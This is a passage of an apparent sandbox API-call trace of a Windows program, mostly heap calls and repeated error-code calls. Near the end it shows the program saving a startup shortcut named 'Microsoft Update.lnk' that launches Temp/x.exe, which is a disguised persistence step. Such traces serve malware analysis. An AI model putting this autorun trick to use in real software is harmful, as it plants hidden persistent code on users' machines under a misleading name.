hHeap=0x2af0000) returned 1 [0225.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0225.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0225.705] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0225.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0225.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0225.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0225.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0225.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0225.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0225.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0225.705] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0225.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0225.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68480 [0225.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0225.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0225.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0225.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0225.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0225.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0225.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0225.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0225.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0225.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0225.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0225.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0225.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0225.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0225.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0225.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68480 | out: hHeap=0x2af0000) returned 1 [0225.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0225.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0225.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0225.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0225.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0225.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0225.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0225.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0225.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0225.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0225.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0225.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0225.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0225.707] CharUpperBuffW (in: lpsz="TempDir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0225.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0225.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0225.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab488 [0225.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0225.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0225.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5c0 [0225.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0225.707] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0225.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0225.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eaea0 [0225.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0225.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0225.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0225.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0225.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0225.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0225.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0225.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0225.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0225.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0225.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0225.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0225.707] GetLastError () returned 0x3f0 [0225.708] SetLastError (dwErrCode=0x3f0) [0225.708] GetLastError () returned 0x3f0 [0225.708] SetLastError (dwErrCode=0x3f0) [0225.708] GetLastError () returned 0x3f0 [0225.708] SetLastError (dwErrCode=0x3f0) [0225.708] GetLastError () returned 0x3f0 [0225.708] SetLastError (dwErrCode=0x3f0) [0225.708] GetLastError () returned 0x3f0 [0225.708] SetLastError (dwErrCode=0x3f0) [0225.708] GetLastError () returned 0x3f0 [0225.708] SetLastError (dwErrCode=0x3f0) [0225.708] GetLastError () returned 0x3f0 [0225.708] SetLastError (dwErrCode=0x3f0) [0225.708] GetLastError () returned 0x3f0 [0225.708] SetLastError (dwErrCode=0x3f0) [0225.708] GetLastError () returned 0x3f0 [0225.708] SetLastError (dwErrCode=0x3f0) [0225.708] GetLastError () returned 0x3f0 [0225.708] SetLastError (dwErrCode=0x3f0) [0225.708] GetLastError () returned 0x3f0 [0225.708] SetLastError (dwErrCode=0x3f0) [0225.708] GetLastError () returned 0x3f0 [0225.708] SetLastError (dwErrCode=0x3f0) [0225.708] GetLastError () returned 0x3f0 [0225.708] SetLastError (dwErrCode=0x3f0) [0225.708] GetLastError () returned 0x3f0 [0225.709] SetLastError (dwErrCode=0x3f0) [0225.709] GetLastError () returned 0x3f0 [0225.709] SetLastError (dwErrCode=0x3f0) [0225.709] GetLastError () returned 0x3f0 [0225.709] SetLastError (dwErrCode=0x3f0) [0225.709] GetLastError () returned 0x3f0 [0225.709] SetLastError (dwErrCode=0x3f0) [0225.709] GetLastError () returned 0x3f0 [0225.709] SetLastError (dwErrCode=0x3f0) [0225.709] GetLastError () returned 0x3f0 [0225.709] SetLastError (dwErrCode=0x3f0) [0225.709] GetLastError () returned 0x3f0 [0225.709] SetLastError (dwErrCode=0x3f0) [0225.709] GetLastError () returned 0x3f0 [0225.709] SetLastError (dwErrCode=0x3f0) [0225.709] GetLastError () returned 0x3f0 [0225.709] SetLastError (dwErrCode=0x3f0) [0225.709] GetLastError () returned 0x3f0 [0225.709] SetLastError (dwErrCode=0x3f0) [0225.709] GetLastError () returned 0x3f0 [0225.709] SetLastError (dwErrCode=0x3f0) [0225.709] GetLastError () returned 0x3f0 [0225.709] SetLastError (dwErrCode=0x3f0) [0225.709] GetLastError () returned 0x3f0 [0225.709] SetLastError (dwErrCode=0x3f0) [0225.709] GetLastError () returned 0x3f0 [0225.710] SetLastError (dwErrCode=0x3f0) [0225.710] GetLastError () returned 0x3f0 [0225.710] SetLastError (dwErrCode=0x3f0) [0225.710] GetLastError () returned 0x3f0 [0225.710] SetLastError (dwErrCode=0x3f0) [0225.710] GetLastError () returned 0x3f0 [0225.710] SetLastError (dwErrCode=0x3f0) [0225.710] GetLastError () returned 0x3f0 [0225.710] SetLastError (dwErrCode=0x3f0) [0225.710] GetLastError () returned 0x3f0 [0225.710] SetLastError (dwErrCode=0x3f0) [0225.710] GetLastError () returned 0x3f0 [0225.710] SetLastError (dwErrCode=0x3f0) [0225.710] GetLastError () returned 0x3f0 [0225.710] SetLastError (dwErrCode=0x3f0) [0225.710] GetLastError () returned 0x3f0 [0225.710] SetLastError (dwErrCode=0x3f0) [0225.710] GetLastError () returned 0x3f0 [0225.710] SetLastError (dwErrCode=0x3f0) [0225.710] GetLastError () returned 0x3f0 [0225.710] SetLastError (dwErrCode=0x3f0) [0225.710] GetLastError () returned 0x3f0 [0225.710] SetLastError (dwErrCode=0x3f0) [0225.710] GetLastError () returned 0x3f0 [0225.710] SetLastError (dwErrCode=0x3f0) [0225.710] GetLastError () returned 0x3f0 [0225.711] SetLastError (dwErrCode=0x3f0) [0225.711] GetLastError () returned 0x3f0 [0225.711] SetLastError (dwErrCode=0x3f0) [0225.711] GetLastError () returned 0x3f0 [0225.711] SetLastError (dwErrCode=0x3f0) [0225.711] GetLastError () returned 0x3f0 [0225.711] SetLastError (dwErrCode=0x3f0) [0225.711] GetLastError () returned 0x3f0 [0225.711] SetLastError (dwErrCode=0x3f0) [0225.711] GetLastError () returned 0x3f0 [0225.711] SetLastError (dwErrCode=0x3f0) [0225.711] GetLastError () returned 0x3f0 [0225.711] SetLastError (dwErrCode=0x3f0) [0225.711] GetLastError () returned 0x3f0 [0225.711] SetLastError (dwErrCode=0x3f0) [0225.711] GetLastError () returned 0x3f0 [0225.711] SetLastError (dwErrCode=0x3f0) [0225.711] GetLastError () returned 0x3f0 [0225.712] SetLastError (dwErrCode=0x3f0) [0225.712] GetLastError () returned 0x3f0 [0225.712] SetLastError (dwErrCode=0x3f0) [0225.712] GetLastError () returned 0x3f0 [0225.712] SetLastError (dwErrCode=0x3f0) [0225.712] GetLastError () returned 0x3f0 [0225.712] SetLastError (dwErrCode=0x3f0) [0225.712] GetLastError () returned 0x3f0 [0225.712] SetLastError (dwErrCode=0x3f0) [0225.712] GetLastError () returned 0x3f0 [0225.712] SetLastError (dwErrCode=0x3f0) [0225.712] GetLastError () returned 0x3f0 [0225.712] SetLastError (dwErrCode=0x3f0) [0225.712] GetLastError () returned 0x3f0 [0225.712] SetLastError (dwErrCode=0x3f0) [0225.712] GetLastError () returned 0x3f0 [0225.712] SetLastError (dwErrCode=0x3f0) [0225.712] GetLastError () returned 0x3f0 [0225.712] SetLastError (dwErrCode=0x3f0) [0225.712] GetLastError () returned 0x3f0 [0225.712] SetLastError (dwErrCode=0x3f0) [0225.712] GetLastError () returned 0x3f0 [0225.712] SetLastError (dwErrCode=0x3f0) [0225.712] GetLastError () returned 0x3f0 [0225.712] SetLastError (dwErrCode=0x3f0) [0225.712] GetLastError () returned 0x3f0 [0225.713] SetLastError (dwErrCode=0x3f0) [0225.713] GetLastError () returned 0x3f0 [0225.713] SetLastError (dwErrCode=0x3f0) [0225.713] GetLastError () returned 0x3f0 [0225.713] SetLastError (dwErrCode=0x3f0) [0225.713] GetLastError () returned 0x3f0 [0225.713] SetLastError (dwErrCode=0x3f0) [0225.713] GetLastError () returned 0x3f0 [0225.713] SetLastError (dwErrCode=0x3f0) [0225.713] GetLastError () returned 0x3f0 [0225.713] SetLastError (dwErrCode=0x3f0) [0225.713] GetLastError () returned 0x3f0 [0225.713] SetLastError (dwErrCode=0x3f0) [0225.713] GetLastError () returned 0x3f0 [0225.713] SetLastError (dwErrCode=0x3f0) [0225.713] GetLastError () returned 0x3f0 [0225.713] SetLastError (dwErrCode=0x3f0) [0225.713] GetLastError () returned 0x3f0 [0225.713] SetLastError (dwErrCode=0x3f0) [0225.713] GetLastError () returned 0x3f0 [0225.713] SetLastError (dwErrCode=0x3f0) [0225.713] GetLastError () returned 0x3f0 [0225.713] SetLastError (dwErrCode=0x3f0) [0225.713] GetLastError () returned 0x3f0 [0225.713] SetLastError (dwErrCode=0x3f0) [0225.713] GetLastError () returned 0x3f0 [0225.713] SetLastError (dwErrCode=0x3f0) [0225.713] GetLastError () returned 0x3f0 [0225.714] SetLastError (dwErrCode=0x3f0) [0225.714] GetLastError () returned 0x3f0 [0225.714] SetLastError (dwErrCode=0x3f0) [0225.714] GetLastError () returned 0x3f0 [0225.714] SetLastError (dwErrCode=0x3f0) [0225.714] GetLastError () returned 0x3f0 [0225.714] SetLastError (dwErrCode=0x3f0) [0225.714] GetLastError () returned 0x3f0 [0225.714] SetLastError (dwErrCode=0x3f0) [0225.714] GetLastError () returned 0x3f0 [0225.714] SetLastError (dwErrCode=0x3f0) [0225.714] GetLastError () returned 0x3f0 [0225.714] SetLastError (dwErrCode=0x3f0) [0225.714] GetLastError () returned 0x3f0 [0225.714] SetLastError (dwErrCode=0x3f0) [0225.714] GetLastError () returned 0x3f0 [0225.714] SetLastError (dwErrCode=0x3f0) [0225.714] GetLastError () returned 0x3f0 [0225.714] SetLastError (dwErrCode=0x3f0) [0225.714] GetLastError () returned 0x3f0 [0225.714] SetLastError (dwErrCode=0x3f0) [0225.714] GetLastError () returned 0x3f0 [0225.714] SetLastError (dwErrCode=0x3f0) [0225.714] GetLastError () returned 0x3f0 [0225.714] SetLastError (dwErrCode=0x3f0) [0225.714] GetLastError () returned 0x3f0 [0225.715] SetLastError (dwErrCode=0x3f0) [0225.715] GetLastError () returned 0x3f0 [0225.715] SetLastError (dwErrCode=0x3f0) [0225.715] GetLastError () returned 0x3f0 [0225.715] SetLastError (dwErrCode=0x3f0) [0225.715] GetLastError () returned 0x3f0 [0225.715] SetLastError (dwErrCode=0x3f0) [0225.715] GetLastError () returned 0x3f0 [0225.715] SetLastError (dwErrCode=0x3f0) [0225.715] GetLastError () returned 0x3f0 [0225.715] SetLastError (dwErrCode=0x3f0) [0225.715] GetLastError () returned 0x3f0 [0225.715] SetLastError (dwErrCode=0x3f0) [0225.715] GetLastError () returned 0x3f0 [0225.715] SetLastError (dwErrCode=0x3f0) [0225.715] GetLastError () returned 0x3f0 [0225.715] SetLastError (dwErrCode=0x3f0) [0225.715] GetLastError () returned 0x3f0 [0225.715] SetLastError (dwErrCode=0x3f0) [0225.715] GetLastError () returned 0x3f0 [0225.715] SetLastError (dwErrCode=0x3f0) [0225.715] GetLastError () returned 0x3f0 [0225.715] SetLastError (dwErrCode=0x3f0) [0225.715] GetLastError () returned 0x3f0 [0225.715] SetLastError (dwErrCode=0x3f0) [0225.715] GetLastError () returned 0x3f0 [0225.716] SetLastError (dwErrCode=0x3f0) [0225.716] GetLastError () returned 0x3f0 [0225.716] SetLastError (dwErrCode=0x3f0) [0225.716] GetLastError () returned 0x3f0 [0225.716] SetLastError (dwErrCode=0x3f0) [0225.716] GetLastError () returned 0x3f0 [0225.716] SetLastError (dwErrCode=0x3f0) [0225.716] GetLastError () returned 0x3f0 [0225.716] SetLastError (dwErrCode=0x3f0) [0225.716] GetLastError () returned 0x3f0 [0225.716] SetLastError (dwErrCode=0x3f0) [0225.716] GetLastError () returned 0x3f0 [0225.716] SetLastError (dwErrCode=0x3f0) [0225.716] GetLastError () returned 0x3f0 [0225.716] SetLastError (dwErrCode=0x3f0) [0225.716] GetLastError () returned 0x3f0 [0225.716] SetLastError (dwErrCode=0x3f0) [0225.716] GetLastError () returned 0x3f0 [0225.716] SetLastError (dwErrCode=0x3f0) [0225.716] GetLastError () returned 0x3f0 [0225.716] GetLastError () returned 0x3f0 [0225.716] GetLastError () returned 0x3f0 [0225.716] GetLastError () returned 0x3f0 [0225.717] GetLastError () returned 0x3f0 [0225.717] GetLastError () returned 0x3f0 [0225.717] GetLastError () returned 0x3f0 [0225.717] GetLastError () returned 0x3f0 [0225.717] GetLastError () returned 0x3f0 [0225.717] GetLastError () returned 0x3f0 [0225.717] GetLastError () returned 0x3f0 [0225.717] GetLastError () returned 0x3f0 [0225.717] GetLastError () returned 0x3f0 [0225.717] GetLastError () returned 0x3f0 [0225.717] GetLastError () returned 0x3f0 [0225.717] GetLastError () returned 0x3f0 [0225.717] GetLastError () returned 0x3f0 [0225.717] GetLastError () returned 0x3f0 [0225.717] GetLastError () returned 0x3f0 [0225.717] GetLastError () returned 0x3f0 [0225.717] GetLastError () returned 0x3f0 [0225.717] GetLastError () returned 0x3f0 [0225.717] GetLastError () returned 0x3f0 [0225.717] GetLastError () returned 0x3f0 [0225.718] GetLastError () returned 0x3f0 [0225.718] GetLastError () returned 0x3f0 [0225.718] GetLastError () returned 0x3f0 [0225.718] GetLastError () returned 0x3f0 [0225.718] GetLastError () returned 0x3f0 [0225.718] GetLastError () returned 0x3f0 [0225.718] GetLastError () returned 0x3f0 [0225.718] GetLastError () returned 0x3f0 [0225.718] GetLastError () returned 0x3f0 [0225.718] GetLastError () returned 0x3f0 [0225.718] GetLastError () returned 0x3f0 [0225.718] GetLastError () returned 0x3f0 [0225.718] GetLastError () returned 0x3f0 [0225.718] GetLastError () returned 0x3f0 [0225.718] GetLastError () returned 0x3f0 [0225.718] GetLastError () returned 0x3f0 [0225.718] GetLastError () returned 0x3f0 [0225.718] GetLastError () returned 0x3f0 [0225.718] GetLastError () returned 0x3f0 [0225.719] GetLastError () returned 0x3f0 [0225.719] GetLastError () returned 0x3f0 [0225.719] GetLastError () returned 0x3f0 [0225.719] GetLastError () returned 0x3f0 [0225.719] GetLastError () returned 0x3f0 [0225.719] GetLastError () returned 0x3f0 [0225.719] GetLastError () returned 0x3f0 [0225.719] GetLastError () returned 0x3f0 [0225.719] GetLastError () returned 0x3f0 [0225.719] GetLastError () returned 0x3f0 [0225.719] GetLastError () returned 0x3f0 [0225.719] GetLastError () returned 0x3f0 [0225.719] GetLastError () returned 0x3f0 [0225.719] GetLastError () returned 0x3f0 [0225.719] GetLastError () returned 0x3f0 [0225.719] GetLastError () returned 0x3f0 [0225.719] GetLastError () returned 0x3f0 [0225.719] GetLastError () returned 0x3f0 [0225.719] GetLastError () returned 0x3f0 [0225.720] GetLastError () returned 0x3f0 [0225.720] GetLastError () returned 0x3f0 [0225.720] GetLastError () returned 0x3f0 [0225.720] GetLastError () returned 0x3f0 [0225.720] GetLastError () returned 0x3f0 [0225.720] GetLastError () returned 0x3f0 [0225.720] GetLastError () returned 0x3f0 [0225.720] GetLastError () returned 0x3f0 [0225.720] GetLastError () returned 0x3f0 [0225.720] GetLastError () returned 0x3f0 [0225.720] GetLastError () returned 0x3f0 [0225.720] GetLastError () returned 0x3f0 [0225.720] GetLastError () returned 0x3f0 [0225.720] GetLastError () returned 0x3f0 [0225.720] GetLastError () returned 0x3f0 [0225.720] CoInitialize (pvReserved=0x0) returned 0x0 [0225.722] CoCreateInstance (in: rclsid=0x482a08*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4828a8*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8cf86c | out: ppv=0x8cf86c*=0xa34ec8) returned 0x0 [0225.728] ShellLink:IShellLinkW:SetPath (This=0xa34ec8, pszFile="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/x.exe") returned 0x0 [0228.027] ShellLink:IShellLinkW:SetWorkingDirectory (This=0xa34ec8, pszDir="C:\\Users\\FD1HVy\\AppData\\Local\\Temp") returned 0x0 [0228.027] ShellLink:IUnknown:QueryInterface (in: This=0xa34ec8, riid=0x482968*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8cf874 | out: ppvObject=0x8cf874*=0xa34ed4) returned 0x0 [0228.027] ShellLink:IPersistFile:Save (This=0xa34ed4, pszFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk", fRemember=1) returned 0x0 [0228.125] ShellLink:IUnknown:Release (This=0xa34ed4) returned 0x1 [0228.125] ShellLink:IUnknown:Release (This=0xa34ec8) returned 0x0 [0228.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0228.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0228.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0228.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0228.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0228.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0228.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0228.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0228.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eaea0 | out: hHeap=0x2af0000) returned 1 [0228.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0228.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0228.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0228.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0228.126] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0228.126] TranslateMessage (lpMsg=0x8cf968) returned 0 [0228.126] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0228.126] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0228.126] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0228.126] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0228.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0228.126] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0228.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0228.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0228.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0228.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0228.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0228.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0228.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0228.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0228.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0228.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0228.127] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0228.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0228.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0228.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0228.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0228.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0228.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0228.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0228.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0228.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0228.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0228.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0228.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0228.127] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0228.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0228.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0228.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab650 [0228.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0228.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0228.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab488 [0228.128] 